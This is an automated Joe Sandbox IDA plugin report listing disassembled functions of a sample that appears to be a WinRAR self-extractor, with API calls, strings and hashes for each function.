Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: ea342d402b127d19f52d0d7c85be43ee894bef547092535bb66db8be0c43208a
Instruction ID: 9df02d4068988500a81b3bf735e3ebe3210432f9898ccf4dbd96fb557767731a
Opcode Fuzzy Hash: ea342d402b127d19f52d0d7c85be43ee894bef547092535bb66db8be0c43208a
Instruction Fuzzy Hash: D24155B1A00274A6DF21EFA4ED55EDE737CEF55380F0048A6B649E7051DB388B99CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00131218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0013122E

Part of subcall function 0012B146: GetVersionExW.KERNEL32(?), ref: 0012B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00131251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00131263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00131274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00131284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00131294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001312CF
__aullrem.LIBCMT ref: 00131379

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: d33a122373ff0f927a2b8ce5e007fe8a4234e5ae61af9f6da7bd182b022a720f
Instruction ID: 29451a0e128c802a17c971d4e3bd77fe0b795493b94e03764a2bfe8d78678fda
Opcode Fuzzy Hash: d33a122373ff0f927a2b8ce5e007fe8a4234e5ae61af9f6da7bd182b022a720f
Instruction Fuzzy Hash: 9C4105B2508305AFC710DF65C88496BFBE9FB88355F00892EF596C6610E734E659CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00122210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00122536

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

Part of subcall function 001305DA: _wcslen.LIBCMT ref: 001305E0

Strings

x%u, xrefs: 001226FD
xc%u, xrefs: 0012275A
;%u, xrefs: 00122523

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 8c26fb9cc55250ac35d02f55427844b2a8b4561a7a0e81d8aaf1a672c40c30b6
Instruction ID: 665d9c089c1ca44e6f301dab2e9bc570b3f24df843a720e85b7060d50c4238c7
Opcode Fuzzy Hash: 8c26fb9cc55250ac35d02f55427844b2a8b4561a7a0e81d8aaf1a672c40c30b6
Instruction Fuzzy Hash: CEF15971604360ABCB25EF24A495BFE77D5AFA4300F08056DFD869B283CB74C965C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00139CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00139D0A

Strings

<style>, xrefs: 00139E30
</style>, xrefs: 00139E52
</p>, xrefs: 00139DE8
>, xrefs: 00139D4B
<br>, xrefs: 00139DFE

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 68f978c57f87bbe1d054743ce360b9a6663a891f550c6230c063592d5be7d842
Instruction ID: d5e919cb5523b59216d13c337c4862e252d8844652e973219388450229097094
Opcode Fuzzy Hash: 68f978c57f87bbe1d054743ce360b9a6663a891f550c6230c063592d5be7d842
Instruction Fuzzy Hash: D251496674436395DB30AAA59C2377773E4DFA1750F69042AFDC18B2C0FBE58C818261

Uniqueness

Uniqueness Score: -1.00%

Function 0014F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0014FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0014F6CF
__fassign.LIBCMT ref: 0014F74A
__fassign.LIBCMT ref: 0014F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0014F78B
WriteFile.KERNEL32(?,00000000,00000000,0014FE02,00000000,?,?,?,?,?,?,?,?,?,0014FE02,00000000), ref: 0014F7AA
WriteFile.KERNEL32(?,00000000,00000001,0014FE02,00000000,?,?,?,?,?,?,?,?,?,0014FE02,00000000), ref: 0014F7E3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8a61567337c37c62ebb029e21fae286f16077199a6b3f600307713e6ce8c6ba3
Instruction ID: 08d40856a2546d1bda5c662b93f60b51f903ba319f81ce4f20d050340410bc7e
Opcode Fuzzy Hash: 8a61567337c37c62ebb029e21fae286f16077199a6b3f600307713e6ce8c6ba3
Instruction Fuzzy Hash: 715182B5A002499FCB10CFA8D885AEEBBF4EF09310F15416EE555E72A1D770AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00142900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00142937
___except_validate_context_record.LIBVCRUNTIME ref: 0014293F
_ValidateLocalCookies.LIBCMT ref: 001429C8
__IsNonwritableInCurrentImage.LIBCMT ref: 001429F3
_ValidateLocalCookies.LIBCMT ref: 00142A48

Strings

csm, xrefs: 001429DD

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5bd1b0b02b278bbc62ba390e34246a4db10d93679fb8e7ebed05b31dcc48c637
Instruction ID: 9e6555fed795b9fb2e45a9b42092460d08241dfb85ce85d9420849ee64c48eca
Opcode Fuzzy Hash: 5bd1b0b02b278bbc62ba390e34246a4db10d93679fb8e7ebed05b31dcc48c637
Instruction Fuzzy Hash: BC41C534A00219EFCF14DF69C885A9E7BF5AF44328F648055FC15AB3A2D771DA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00139ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00139EEE
GetWindowRect.USER32(?,00000000), ref: 00139F44
ShowWindow.USER32(?,00000005,00000000), ref: 00139FDB
SetWindowTextW.USER32(?,00000000), ref: 00139FE3
ShowWindow.USER32(00000000,00000005), ref: 00139FF9

Strings

RarHtmlClassName, xrefs: 00139FA5

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: e866d13a4f4dfab436f853b006ed7716b244ce1aa33be0487201568ebdba652e
Instruction ID: 61bc7264b8338869ed744343b7417973766d243f292da057241c0093961576bf
Opcode Fuzzy Hash: e866d13a4f4dfab436f853b006ed7716b244ce1aa33be0487201568ebdba652e
Instruction Fuzzy Hash: 7E41C231104310EFDB259F64DC8CB6BBFA8FF48B01F044559F859AA166DB74DA48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00139955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0013995E
_wcslen.LIBCMT ref: 00139993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00139987
 , xrefs: 00139A21
, xrefs: 001399B0
<br>, xrefs: 001399DF

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: bb972ae9df8b38514eb4c7bcfa7335549e715f716a36bfb3ab437fb38d57e057
Instruction ID: db14c9433eb56d9e39562954af36bbae7fdd59ee85ebf71854fad8bed912aad7
Opcode Fuzzy Hash: bb972ae9df8b38514eb4c7bcfa7335549e715f716a36bfb3ab437fb38d57e057
Instruction Fuzzy Hash: 1031713264434596DA34BF549C42B7B73E4EB90724F60451FF8965B3D0FBE0AD8583A1

Uniqueness

Uniqueness Score: -1.00%

Function 0014C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014C868: _free.LIBCMT ref: 0014C891

_free.LIBCMT ref: 0014C8F2

Part of subcall function 00148DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?), ref: 00148DE2
Part of subcall function 00148DCC: GetLastError.KERNEL32(?,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?,?), ref: 00148DF4

_free.LIBCMT ref: 0014C8FD
_free.LIBCMT ref: 0014C908
_free.LIBCMT ref: 0014C95C
_free.LIBCMT ref: 0014C967
_free.LIBCMT ref: 0014C972
_free.LIBCMT ref: 0014C97D

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 35135b0a9ba091dcd25dc51af20fe7bcc8922e445f78998904b37d1952b020f9
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 0B113371A82B09BAE560B7B1CC07FCB7BAC9F24B00F404C15B29D670B2DB75B5058790

Uniqueness

Uniqueness Score: -1.00%

Function 0013E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0013E669,0013E5CC,0013E86D), ref: 0013E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0013E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0013E630

Strings

KERNEL32.DLL, xrefs: 0013E600
ReleaseSRWLockExclusive, xrefs: 0013E625
AcquireSRWLockExclusive, xrefs: 0013E615

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 12ed1eb5c74b6cfb73968f24a19d2bd58b5275966405a85c3a7ac7365efae0a8
Instruction ID: f5305e82c757c072ae9c6e8237f2cc15a1ab68174f6795bcf1c8a596bda04d4b
Opcode Fuzzy Hash: 12ed1eb5c74b6cfb73968f24a19d2bd58b5275966405a85c3a7ac7365efae0a8
Instruction Fuzzy Hash: C9F040B2390322EBCF214FA54C96A6622CD6B21392F000038EC11EB6C0FB20CE959B80

Uniqueness

Uniqueness Score: -1.00%

Function 0013146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 001314C2

Part of subcall function 0012B146: GetVersionExW.KERNEL32(?), ref: 0012B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001314E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00131500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00131513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00131523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00131533

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: e4c7f4c035cda98f76374e8ff7d956991ca8b36b4e636461bf9b5d114df310c5
Instruction ID: 7e7f6c374c2fd7ed815dcdfb5cb408b4641ceb15c616d66dd216712d1e50a7f4
Opcode Fuzzy Hash: e4c7f4c035cda98f76374e8ff7d956991ca8b36b4e636461bf9b5d114df310c5
Instruction Fuzzy Hash: A831F875208305ABC704DFA8D88499BB7F8FF98754F004A1EF995C3610E730D549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00142AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00142AF1,001402FC,0013FA34), ref: 00142B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00142B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00142B2F
SetLastError.KERNEL32(00000000,00142AF1,001402FC,0013FA34), ref: 00142B81

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7f5aede92130c5a2cc15dd9a43efe62b3e1b06b7d0e4145b8ecfcd5db0d50e2d
Instruction ID: 67eaa10350968017ef6a7a8322e00fe83240a60fc44317396dd18582ce894b0e
Opcode Fuzzy Hash: 7f5aede92130c5a2cc15dd9a43efe62b3e1b06b7d0e4145b8ecfcd5db0d50e2d
Instruction Fuzzy Hash: 6301F733909711AEA6282FB47C8592B7F99EF657B67E0073AF520594F0EF624D809184

Uniqueness

Uniqueness Score: -1.00%

Function 001497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00161030,00144674,00161030,?,?,00143F73,00000050,?,00161030,00000200), ref: 001497E9
_free.LIBCMT ref: 0014981C
_free.LIBCMT ref: 00149844
SetLastError.KERNEL32(00000000,?,00161030,00000200), ref: 00149851
SetLastError.KERNEL32(00000000,?,00161030,00000200), ref: 0014985D
_abort.LIBCMT ref: 00149863

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 7ab877359e946cf34c94ec57f416d86618179d92863a1b11aac70b022cb7d30a
Instruction ID: 8b937155c692526ed2e16166ab3f4908ba49ac6987c0b94e86db7966eaa36886
Opcode Fuzzy Hash: 7ab877359e946cf34c94ec57f416d86618179d92863a1b11aac70b022cb7d30a
Instruction Fuzzy Hash: 19F02835540706A6C71233787C0AA1F2AA58FF2B72F220034F534A75F2FF20C9014565

Uniqueness

Uniqueness Score: -1.00%

Function 0013DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013DC72
TranslateMessage.USER32(?), ref: 0013DC7C
DispatchMessageW.USER32(?), ref: 0013DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013DC91

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: a2f5b7b1449506b826d3c83b0ea1056bc321a9db5549829485b893f2aca8ebf6
Instruction ID: 6280051173949e0c4517bb0c444ef018c36577bbbd2f82db0bf0ef1ea0029c67
Opcode Fuzzy Hash: a2f5b7b1449506b826d3c83b0ea1056bc321a9db5549829485b893f2aca8ebf6
Instruction Fuzzy Hash: 44F03C72A01219BBCB206BA5EC4CDCF7F6DEF42B91F044111B51AD2050D6748686C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0012C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 001305DA: _wcslen.LIBCMT ref: 001305E0

Part of subcall function 0012B92D: _wcsrchr.LIBVCRUNTIME ref: 0012B944

_wcslen.LIBCMT ref: 0012C197
_wcslen.LIBCMT ref: 0012C1DF

Strings

.sfx, xrefs: 0012C11A
.exe, xrefs: 0012C10B
.rar, xrefs: 0012C0E1, 0012C134

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: d5b4ac164fdaa4a40bdb2b533acf94f31f8d1f042bc3b51a2f84dfdd714497de
Instruction ID: a8ddce43f496299d3e8f520565a18609c63e5424a5dddd306affc72c92d04aac
Opcode Fuzzy Hash: d5b4ac164fdaa4a40bdb2b533acf94f31f8d1f042bc3b51a2f84dfdd714497de
Instruction Fuzzy Hash: 83413726500372D6C736AF34A852A7EB3A8EF54744F20490EFAD26B181EB514DB5C3D5

Uniqueness

Uniqueness Score: -1.00%

Function 0013CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0013CE9D

Part of subcall function 0012B690: _wcslen.LIBCMT ref: 0012B696

_swprintf.LIBCMT ref: 0013CED1

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

SetDlgItemTextW.USER32(?,00000066,0016946A), ref: 0013CEF1
EndDialog.USER32(?,00000001), ref: 0013CFFE

Strings

%s%s%u, xrefs: 0013CEC6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
